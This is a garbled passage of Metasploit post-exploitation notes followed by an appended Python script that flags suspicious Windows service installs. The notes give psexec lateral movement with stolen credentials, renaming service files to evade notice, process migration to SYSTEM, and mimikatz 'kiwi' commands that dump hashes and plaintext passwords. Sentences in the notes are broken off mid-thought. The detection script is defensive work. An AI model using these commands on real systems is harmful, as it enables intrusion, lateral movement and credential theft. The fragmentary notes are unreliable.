exploit/multi/handler to catch reverse shells and manage several sessions. Make sure that you have the correct payload to catch.
exploit/windows/smb/psexec module with known credentials to create easy meterpreter sessions to pivot and exploit further. Can set the
SERVICE_FILENAME option to remove the random garbage used, because it's suspicious (using something like
sessions -l command. Channels inside of sessions are managed with
channels -l command. Upgrade existing shells with the
sessions -u 1 command.
CTRL-Z will background a channel or session
use [module name]
SYSTEM, and we need to make sure the process we're in is the same architecture as the host.
sysinfo. Check the
Meterpreterinfo to make sure they match. If we need to move, check which running processes have the correct arch and are running as
ps -A x64 -s, then we can move with
migrate [PID]. Validate the arch and meterpreter types match with
load kiwi. Running
help will show our new mimikatz commands we can use. Using
creds_all will dump all available hashes and plaintext passwords!
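
The psexec note above says the random service file name stands out and that it can be changed, so a detection should not rely on randomness alone. The triage sketch below is an added example, not part of the original notes. The record fields, sample events and thresholds are constructed assumptions, as is the premise that the service binary is staged directly in the Windows directory (for example through an ADMIN$ upload).

```python
import re

# Constructed sample records shaped like Windows System log Event ID 7045
# ("A service was installed in the system"). All values are made up.
SAMPLE_EVENTS = [
    {"host": "ws01", "service_name": "Print Spooler Helper",
     "image_path": r"C:\Program Files\Vendor\helper.exe"},
    {"host": "ws02", "service_name": "kQzXvRtPmL",
     "image_path": r"%SYSTEMROOT%\hTbWqZxL.exe"},
    # Renamed binary: no random name, but still staged in the Windows directory.
    {"host": "ws03", "service_name": "WinUpdateSvc",
     "image_path": r"%SYSTEMROOT%\updater.exe"},
]

VOWELS = set("aeiouAEIOU")
# An .exe sitting directly in the Windows directory, not in a subfolder.
ROOT_BINARY = re.compile(r"^(%systemroot%|[a-z]:\\windows)\\[^\\]+\.exe$",
                         re.IGNORECASE)

def looks_random(name):
    """Heuristic (assumed thresholds): few vowels or constant case flipping."""
    letters = [c for c in name if c.isalpha()]
    if len(letters) < 6 or " " in name:
        return False
    vowel_ratio = sum(c in VOWELS for c in letters) / len(letters)
    flips = sum(a.isupper() != b.isupper() for a, b in zip(letters, letters[1:]))
    flip_ratio = flips / (len(letters) - 1)
    return vowel_ratio < 0.2 or flip_ratio > 0.6

def triage(event):
    """Return the list of reasons a service-install record deserves review."""
    reasons = []
    stem = event["image_path"].rsplit("\\", 1)[-1].rsplit(".", 1)[0]
    if looks_random(event["service_name"]):
        reasons.append("random-looking service name")
    if looks_random(stem):
        reasons.append("random-looking binary name")
    if ROOT_BINARY.match(event["image_path"]):
        reasons.append("service binary directly in Windows directory")
    return reasons

def flagged(events):
    """Map host -> reasons for every record with at least one reason."""
    return {e["host"]: r for e in events if (r := triage(e))}

if __name__ == "__main__":
    for host, reasons in flagged(SAMPLE_EVENTS).items():
        print(host, "->", "; ".join(reasons))
```

The third record shows why the location check matters: a plausible file name clears the randomness heuristic but the install is still surfaced.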